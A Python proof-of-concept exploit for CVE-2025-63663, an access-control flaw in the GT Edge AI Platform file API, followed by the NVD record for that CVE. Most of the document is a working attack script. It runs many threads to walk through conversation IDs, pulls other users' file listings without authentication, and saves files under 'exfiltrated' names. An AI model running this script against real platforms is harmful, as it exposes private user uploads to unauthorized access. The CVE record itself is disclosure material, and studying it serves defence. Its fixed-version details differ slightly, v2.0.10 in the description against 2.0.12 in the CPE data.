CVE-2025-63663

# CVE-2025-63663 PoC - GT Edge AI Platform IDOR Vulnerability # Target: GT Edge AI Platform < v2.0.10 # Vulnerability: Insecure Direct Object Reference in /api/v1/conversations/*/files API # Impact: Unauthorized access to other users' uploaded files import requests import json import sys from concurrent.futures import ThreadPoolExecutor, as_completed class CVE_2025_63663_POC: def __init__(self, target_url): self.target_url = target_url.rstrip('/') self.vulnerable_endpoint = f"{self.target_url}/api/v1/conversations" def check_vulnerability(self, conversation_id): """Check if a specific conversation ID is vulnerable""" try: # Try to access files from target conversation without authentication url = f"{self.vulnerable_endpoint}/{conversation_id}/files" headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Accept': 'application/json' } response = requests.get(url, headers=headers, timeout=10, verify=False) if response.status_code == 200: try: data = response.json() if 'files' in data or isinstance(data, list): return { 'vulnerable': True, 'conversation_id': conversation_id, 'status_code': response.status_code, 'response': data } except: pass return { 'vulnerable': False, 'conversation_id': conversation_id, 'status_code': response.status_code } except requests.exceptions.RequestException as e: return { 'vulnerable': False, 'conversation_id': conversation_id, 'error': str(e) } def enumerate_conversations(self, start_id=1, end_id=100, threads=10): """Enumerate conversations to find accessible files""" results = [] conversation_ids = [str(i) for i in range(start_id, end_id + 1)] print(f"[*] Scanning {len(conversation_ids)} conversation IDs...") print(f"[*] Target: {self.target_url}") print(f"[*] Threads: {threads}") print("-" * 60) with ThreadPoolExecutor(max_workers=threads) as executor: futures = {executor.submit(self.check_vulnerability, cid): cid for cid in conversation_ids} for future in as_completed(futures): result = future.result() if result['vulnerable']: print(f"[!] VULNERABLE: Conversation ID {result['conversation_id']}") print(f" Files: {json.dumps(result['response'], indent=2)}") results.append(result) return results def download_file(self, conversation_id, file_id): """Download a specific file from vulnerable conversation""" try: url = f"{self.vulnerable_endpoint}/{conversation_id}/files/{file_id}/download" headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' } response = requests.get(url, headers=headers, timeout=30, verify=False) if response.status_code == 200: filename = f"exfiltrated_file_{conversation_id}_{file_id}" with open(filename, 'wb') as f: f.write(response.content) print(f"[+] File downloaded: {filename}") return filename except Exception as e: print(f"[-] Download failed: {e}") return None def main(): if len(sys.argv) < 2: print("Usage: python cve-2025-63663.py <target_url> [start_id] [end_id]") print("Example: python cve-2025-63663.py https://gt-edge-ai.example.com 1 1000") sys.exit(1) target = sys.argv[1] start_id = int(sys.argv[2]) if len(sys.argv) > 2 else 1 end_id = int(sys.argv[3]) if len(sys.argv) > 3 else 100 poc = CVE_2025_63663_POC(target) vulnerable_results = poc.enumerate_conversations(start_id, end_id) print("-" * 60) print(f"[*] Scan complete. Found {len(vulnerable_results)} vulnerable endpoints.") if vulnerable_results: print("[!] WARNING: Target is vulnerable to CVE-2025-63663") print("[!] Recommendation: Upgrade to GT Edge AI Platform v2.0.10 or later") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-63663", "sourceIdentifier": "[email protected]", "published": "2025-12-22T19:15:49.390", "lastModified": "2026-01-05T17:44:24.507", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incorrect access control in the /api/v1/conversations/*/files API of GT Edge AI Platform before v2.0.10 allows unauthorized attackers to access other users' uploaded files."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gtedge:gt_edge_ai:*:*:*:*:community:*:*:*", "versionEndExcluding": "2.0.12", "matchCriteriaId": "B5535437-227D-49B8-A0E1-D5A8585D8BF3"}]}]}], "references": [{"url": "https://gist.github.com/p80n-sec/f3ca933480157cb4e18c387d92f4d0c2", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/p80n-sec/Vulnerability-Research/blob/main/Pending", "source": "[email protected]", "tags": ["Broken Link"]}]}}